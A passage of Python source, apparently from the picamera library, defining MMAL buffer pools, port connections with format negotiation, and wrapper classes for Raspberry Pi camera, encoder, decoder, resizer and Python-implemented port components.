self.send_buffer(port, block, timeout)
class MMALPortPool(MMALPool):
"""
Construct an MMAL pool for the number and size of buffers required by
the :class:`MMALPort` *port*.
"""
__slots__ = ('_port',)
def __init__(self, port):
pool = mmal.mmal_port_pool_create(
port._port, port._port[0].buffer_num, port._port[0].buffer_size)
if not pool:
raise PiCameraMMALError(
mmal.MMAL_ENOSPC,
'failed to create buffer header pool for port %s' % port.name)
super(MMALPortPool, self).__init__(pool)
self._port = port
def close(self):
if self._pool is not None:
mmal.mmal_port_pool_destroy(self._port._port, self._pool)
self._port = None
self._pool = None
super(MMALPortPool, self).close()
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_all_buffers(port, block, timeout)
class MMALBaseConnection(MMALObject):
"""
Abstract base class for :class:`MMALConnection` and
:class:`MMALPythonConnection`. Handles weakrefs to the source and
target ports, and format negotiation. All other connection details are
handled by the descendent classes.
"""
__slots__ = ('_source', '_target')
default_formats = ()
compatible_opaque_formats = {
('OPQV-single', 'OPQV-single'),
('OPQV-dual', 'OPQV-dual'),
('OPQV-strips', 'OPQV-strips'),
('OPQV-dual', 'OPQV-single'),
('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
}
def __init__(
self, source, target, formats=default_formats):
super(MMALBaseConnection, self).__init__()
if not isinstance(source, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('source is not a port')
if not isinstance(target, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('target is not a port')
if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
raise PiCameraValueError('source is not an output port')
if target.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError('target is not an input port')
if source.connection is not None:
raise PiCameraValueError('source port is already connected')
if target.connection is not None:
raise PiCameraValueError('target port is already connected')
if formats is None:
formats = ()
self._source = source
self._target = target
try:
iter(formats)
except TypeError:
formats = (formats,)
self._negotiate_format(formats)
source._connection = self
target._connection = self
# Descendents continue with connection implementation...
def close(self):
if self._source is not None:
self._source._connection = None
self._source = None
if self._target is not None:
self._target._connection = None
self._target = None
def _negotiate_format(self, formats):
def copy_format():
self._source.commit()
self._target.copy_from(self._source)
self._target.commit()
def max_buffers():
self._source.buffer_count = self._target.buffer_count = max(
self._source.buffer_count, self._target.buffer_count)
self._source.buffer_size = self._target.buffer_size = max(
self._source.buffer_size, self._target.buffer_size)
# Filter out formats that aren't supported on both source and target
# ports. This is a little tricky as ports that support OPAQUE never
# claim they do (so we have to assume it's mutually supported)
mutually_supported = (
set(self._source.supported_formats) &
set(self._target.supported_formats)
) | {mmal.MMAL_ENCODING_OPAQUE}
formats = [f for f in formats if f in mutually_supported]
if formats:
# If there are any formats left to try, perform the negotiation
# with the filtered list. Again, there's some special casing to
# deal with the incompatible OPAQUE sub-formats
for f in formats:
if f == mmal.MMAL_ENCODING_OPAQUE:
if (self._source.opaque_subformat,
self._target.opaque_subformat) in self.compatible_opaque_formats:
self._source.format = mmal.MMAL_ENCODING_OPAQUE
else:
continue
else:
self._source.format = f
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
continue
else:
max_buffers()
return
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to negotiate port format')
else:
# If no formats are available to try (either from filtering or
# because none were given), assume the source port is set up
# properly. Just copy the format to the target and hope the caller
# knows what they're doing
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to copy source format to target port')
else:
max_buffers()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@property
def source(self):
"""
The source :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._source
@property
def target(self):
"""
The target :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._target
class MMALConnection(MMALBaseConnection):
"""
Represents an MMAL internal connection between two components. The
constructor accepts arguments providing the *source* :class:`MMALPort` and
*target* :class:`MMALPort`.
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
.. note::
The default *formats* list starts with OPAQUE; the class understands
the different OPAQUE sub-formats (see :ref:`mmal` for more information)
and will only select OPAQUE if compatible sub-formats can be used on
both ports.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALConnection` object
sending the data, and the :class:`MMALBuffer` object containing data. The
callable may optionally manipulate the :class:`MMALBuffer` and return it
to permit it to continue traversing the connection, or return ``None``
in which case the buffer will be released.
.. note::
There is a significant performance penalty for specifying a
callback between MMAL components as it requires buffers to be
copied from the GPU's memory to the CPU's memory and back again.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between MMAL components.
"""
__slots__ = ('_connection', '_callback', '_wrapper')
default_formats = (
mmal.MMAL_ENCODING_OPAQUE,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not isinstance(source, MMALPort):
raise PiCameraValueError('source is not an MMAL port')
if not isinstance(target, MMALPort):
raise PiCameraValueError('target is not an MMAL port')
super(MMALConnection, self).__init__(source, target, formats)
self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
self._callback = callback
flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
if callback is None:
flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
try:
mmal_check(
mmal.mmal_connection_create(
self._connection, source._port, target._port, flags),
prefix="Failed to create connection")
except:
self._connection = None
raise
def close(self):
if self._connection is not None:
mmal.mmal_connection_destroy(self._connection)
self._connection = None
self._wrapper = None
super(MMALConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return bool(self._connection[0].is_enabled)
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
def wrapper(connection):
buf = mmal.mmal_queue_get(connection[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
modified_buf = self._callback(self, buf)
except:
buf.release()
raise
else:
if modified_buf is not None:
try:
self._target.send_buffer(modified_buf)
except PiCameraPortDisabled:
# Target port disabled; ignore the error
pass
else:
buf.release()
return
buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
self._source.send_buffer(buf)
except PiCameraPortDisabled:
# Source port has been disabled; ignore the error
pass
if self._callback is not None:
self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
self._connection[0].callback = self._wrapper
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
mmal_check(
mmal.mmal_connection_enable(self._connection),
prefix="Failed to enable connection")
if self._callback is not None:
MMALPool(self._connection[0].pool).send_all_buffers(self._source)
def disable(self):
"""
Disables the connection.
"""
mmal_check(
mmal.mmal_connection_disable(self._connection),
prefix="Failed to disable connection")
self._wrapper = None
@property
def name(self):
return self._connection[0].name.decode('ascii')
def __repr__(self):
if self._connection is not None:
return '<MMALConnection "%s">' % self.name
else:
return '<MMALConnection closed>'
class MMALRawCamera(MMALBaseComponent):
"""
The MMAL "raw camera" component.
Don't use this! If you insist on using this anyway, read the forum post
about `raw sensor access`_ first.
.. raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
opaque_input_subformats = ()
opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
"""
Represents the MMAL camera component. This component has 0 input ports and
3 output ports. The intended use of the output ports (which in turn
determines the behaviour of those ports) is as follows:
* Port 0 is intended for preview renderers
* Port 1 is intended for video recording
* Port 2 is intended for still image capture
Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
obtain and manipulate the camera's configuration.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')
annotate_structs = (
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
)
def __init__(self):
global FIX_RGB_BGR_ORDER
super(MMALCamera, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
found = False
# try largest struct to smallest as later firmwares still happily
# accept earlier revision structures
# XXX do old firmwares reject too-large structs?
for struct in reversed(MMALCamera.annotate_structs):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
if FIX_RGB_BGR_ORDER is None:
# old firmware lists BGR24 before RGB24 in supported_formats
for f in self.outputs[1].supported_formats:
if f == mmal.MMAL_ENCODING_BGR24:
FIX_RGB_BGR_ORDER = True
break
elif f == mmal.MMAL_ENCODING_RGB24:
FIX_RGB_BGR_ORDER = False
break
def _get_annotate_rev(self):
try:
return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
def _set_annotate_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera annotation structure revision")
annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
The annotation capabilities of the firmware have evolved over time and
several structures are available for querying and setting video
annotations. By default the :class:`MMALCamera` class will pick the
latest annotation structure supported by the current firmware but you
can select older revisions with :attr:`annotate_rev` for other purposes
(e.g. testing).
""")
class MMALCameraInfo(MMALBaseComponent):
"""
Represents the MMAL camera-info component. Query the
``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
information about the connected camera module.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO
info_structs = (
mmal.MMAL_PARAMETER_CAMERA_INFO_T,
mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
)
def __init__(self):
super(MMALCameraInfo, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
found = False
# try smallest structure to largest as later firmwares reject
# older structures
for struct in MMALCameraInfo.info_structs:
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _get_info_rev(self):
try:
return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _set_info_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera info structure revision")
info_rev = property(_get_info_rev, _set_info_rev, doc="""\
The camera information capabilities of the firmware have evolved over
time and several structures are available for querying camera
information. When initialized, :class:`MMALCameraInfo` will attempt
to discover which structure is in use by the extant firmware. This
property can be used to discover the structure version and to modify
the version in use for other purposes (e.g. testing).
""")
class MMALComponent(MMALBaseComponent):
"""
Represents an MMAL component that acts as a filter of some sort, with a
single input that connects to an upstream source port. This is an asbtract
base class.
"""
__slots__ = ()
def __init__(self):
super(MMALComponent, self).__init__()
assert len(self.opaque_input_subformats) == 1
def close(self):
self.disconnect()
super(MMALComponent, self).close()
def enable(self):
super(MMALComponent, self).enable()
if self.connection is not None:
self.connection.enable()
def disable(self):
if self.connection is not None:
self.connection.disable()
super(MMALComponent, self).disable()
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
class MMALSplitter(MMALComponent):
"""
Represents the MMAL splitter component. This component has 1 input port
and 4 output ports which all generate duplicates of buffers passed to the
input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
"""
Represents the MMAL ISP resizer component. This component has 1 input port
and 1 output port, and supports resizing via the VideoCore ISP, along with
conversion of numerous formats into numerous other formats (e.g. OPAQUE to
RGB, etc). This is more efficient than :class:`MMALResizer` but is only
available on later firmware versions.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = (None,)
class MMALResizer(MMALComponent):
"""
Represents the MMAL VPU resizer component. This component has 1 input port
and 1 output port. This supports resizing via the VPU. This is not as
efficient as :class:`MMALISPResizer` but is available on all firmware
verions. The output port can (and usually should) have a different frame
size to the input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
opaque_input_subformats = (None,)
opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
"""
Represents a generic MMAL encoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoEncoder(MMALEncoder):
"""
Represents the MMAL video encoder component. This component has 1 input
port and 1 output port. The output port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
opaque_input_subformats = ('OPQV-dual',)
opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
"""
Represents the MMAL image encoder component. This component has 1 input
port and 1 output port. The output port is typically configured with
``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
``MMAL_ENCODING_GIF``, etc.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
opaque_input_subformats = ('OPQV-strips',)
opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
"""
Represents a generic MMAL decoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoDecoder(MMALDecoder):
"""
Represents the MMAL video decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
"""
Represents the MMAL iamge decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_JPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
"""
Represents the MMAL renderer component. This component has 1 input port and
0 output ports. It is used to implement the camera preview and overlays.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
"""
Represents the MMAL null-sink component. This component has 1 input port
and 0 output ports. It is used to keep the preview port "alive" (and thus
calculating white-balance and exposure) when the camera preview is not
required.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
"""
Implements ports for Python-based MMAL components.
"""
__slots__ = (
'_buffer_count',
'_buffer_size',
'_connection',
'_enabled',
'_owner',
'_pool',
'_type',
'_index',
'_supported_formats',
'_format',
'_callback',
)
_FORMAT_BPP = {
'I420': 1.5,
'RGB3': 3,
'RGBA': 4,
'BGR3': 3,
'BGRA': 4,
}
def __init__(self, owner, port_type, index):
self._buffer_count = 2
self._buffer_size = 0
self._connection = None
self._enabled = False
self._owner = weakref.ref(owner)
self._pool = None
self._callback = None
self._type = port_type
self._index = index
self._supported_formats = {
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
type=mmal.MMAL_ES_TYPE_VIDEO,
encoding=mmal.MMAL_ENCODING_I420,
es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
def close(self):
self.disconnect()
self.disable()
self._format = None
def __repr__(self):
return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format), self.buffer_count,
self.buffer_size, self.framesize, self.framerate)
def _get_bitrate(self):
return self._format[0].bitrate
def _set_bitrate(self, value):
self._format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def _get_supported_formats(self):
return self._supported_formats
def _set_supported_formats(self, value):
try:
value = {f for f in value}
except TypeError:
value = {value}
if not value:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "port must have at least one valid format")
self._supported_formats = value
supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
Retrieves or sets the set of valid formats for this port. The set must
always contain at least one valid format. A single format can be
specified; it will be converted implicitly to a singleton set.
If the current port :attr:`format` is not a member of the new set, no
error is raised. An error will be raised when :meth:`commit` is next
called if :attr:`format` is still not a member of the set.
""")
def _get_format(self):
return self._format[0].encoding
def _set_format(self, value):
self._format[0].encoding = value
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
""")
def _get_framesize(self):
return PiResolution(
self._format[0].es[0].video.crop.width,
self._format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the source's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
""")
def _get_framerate(self):
video = self._format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
""")
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
@property
def opaque_subformat(self):
return None
def _get_buffer_count(self):
return self._buffer_count
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._buffer_count = int(value)
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port. The
default is 2 but more may be required in the case of long pipelines
with replicated buffers.
""")
def _get_buffer_size(self):
return self._buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers defaults to a value dictated by the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._format, source._format)
else:
mmal.mmal_format_copy(self._format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers. This is typically called after
adjusting the port's format and/or associated settings (like width and
height for video ports).
"""
if self.format not in self.supported_formats:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
self._buffer_count = 2
video = self._format[0].es[0].video
try:
self._buffer_size = int(
MMALPythonPort._FORMAT_BPP[str(self.format)]
* video.width
* video.height)
except KeyError:
# If it's an unknown / encoded format just leave the buffer size
# alone and hope the owning component knows what to set
pass
self._owner()._commit_port(self)
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return self._enabled
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
if self._connection is not None:
if callback is not None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'connected ports must be enabled without callback')
else:
if callback is None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'unconnected ports must be enabled with callback')
if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
self._pool = MMALPythonPortPool(self)
self._callback = callback
self._enabled = True
def disable(self):
"""
Disable the port.
"""
self._enabled = False
if self._pool is not None:
# Release any unprocessed buffers from the owner's queue before
# we destroy them all
while True:
buf = self._owner()._queue.get(False)
if buf:
buf.release()
else:
break
self._pool.close()
self._pool = None
self._callback = None
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self._enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
if self._pool is not None:
# Unconnected port or input port case; retrieve buffer from the
# allocated pool
return self._pool.get_buffer(block, timeout)
else:
# Connected output port case; get a buffer from the target input
# port (in this case the port is just a thin proxy for the
# corresponding input port)
assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
return self._connection.target.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
# NOTE: The MMALPythonConnection callback must occur *before* the test
# for the port being enabled; it's meant to be the connection making
# the callback prior to the buffer getting to the port after all
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
else:
buf = modified_buf
if not self._enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
if self._callback is not None:
# but what about output ports?
try:
# XXX Return value? If it's an input port we should ignore it,
self._callback(self, buf)
except:
buf.release()
raise
if self._type == mmal.MMAL_PORT_TYPE_INPUT:
# Input port case; queue the buffer for processing on the
# owning component
self._owner()._queue.put(buf)
elif self._connection is None:
# Unconnected output port case; release the buffer back to the
# pool
buf.release()
else:
# Connected output port case; forward the buffer to the
# connected component's input port
# XXX If it's a format-change event?
self._connection.target.send_buffer(buf)
@property
def name(self):
return '%s:%s:%d' % (self._owner().name, {
mmal.MMAL_PORT_TYPE_OUTPUT: 'out',
mmal.MMAL_PORT_TYPE_INPUT: 'in',
mmal.MMAL_PORT_TYPE_CONTROL: 'control',
mmal.MMAL_PORT_TYPE_CLOCK: 'clock',
}[self.type], self._index)
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._index
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection options can be specified as keyword arguments. These
will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
return MMALPythonConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALPythonPortPool(MMALPool):
"""
Creates a pool of buffer headers for an :class:`MMALPythonPort`. This is
only used when a fake port is used without a corresponding
:class:`MMALPythonConnection`.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPythonPortPool, self).__init__(
mmal.mmal_pool_create(port.buffer_count, port.buffer_size))
self._port = port
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_all_buffers(port, block, timeout)
class MMALPythonBaseComponent(MMALObject):
"""
Base class for Python-implemented MMAL components. This class provides the
:meth:`_commit_port` method used by descendents to control their ports'
behaviour, and the :attr:`enabled` property. However, it is unlikely that
users will want to sub-class this directly. See
:class:`MMALPythonComponent` for a more useful starting point.
"""
__slots__ = ('_inputs', '_outputs', '_enabled',)
def __init__(self):
super(MMALPythonBaseComponent, self).__init__()
self._enabled = False
self._inputs = ()
self._outputs = ()
# TODO Control port?
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
self.disable()
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return self._enabled
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
self._enabled = True
def disable(self):
"""
Disables the component.
"""
self._enabled = False
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return None
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
def _commit_port(self, port):
"""
Called by ports when their format is committed. Descendents may
override this to reconfigure output ports when input ports are
committed, or to raise errors if the new port configuration is
unacceptable.
.. warning::
This method must *not* reconfigure input ports when called; however
it can reconfigure *output* ports when input ports are committed.
"""
pass
def __repr__(self):
if self._outputs:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALPythonSource(MMALPythonBaseComponent):
"""
Provides a source for other :class:`MMALComponent` instances. The
